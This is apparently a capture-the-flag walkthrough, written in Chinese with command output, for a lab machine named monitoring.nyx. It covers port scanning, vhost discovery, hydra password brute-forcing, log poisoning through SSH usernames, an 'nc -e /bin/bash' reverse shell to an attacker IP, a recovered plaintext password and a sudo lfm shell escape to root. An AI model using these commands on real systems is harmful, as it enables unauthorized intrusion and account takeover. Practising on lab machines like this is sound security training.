80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
└─# nmap -6 -p- -A fe80::20c:29ff:fe1a:234c%eth0 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 06:51 EDT
Nmap scan report for fe80::20c:29ff:fe1a:234c
Host is up (0.00057s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))

80 端口 F12 发现域名

└─# echo ' monitoring.nyx' >> /etc/hosts
└─# gobuster vhost -u monitoring.nyx -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://event.monitoring.nyx/.admin -I -t 64
登录进去再 FUZZ 一下路径: http://event.monitoring.nyx/.admin/event.php

FUZZ 了参数无果,思考了下这个 EVENT 的意思,应该是日志

ipv6 有 ssh,连一下,看到了出现了日志

名字换成一句话注入,客户端报错,hydra 弄不成,用 msf

run 一下,注入成功,反弹 shell: http://event.monitoring.nyx/.admin/event.php?cmd=nc%20-e%20/bin/bash%20192.168.1.129%204444

# 提权

/etc/apache2/.htpasswd 中发现爱你 kevin 用户的口令: $up3r_$3cUr3_@p@CHe

sudo lfm 然后随便选一个文本文件回车打开, !/bin/bash 拿到 root 权限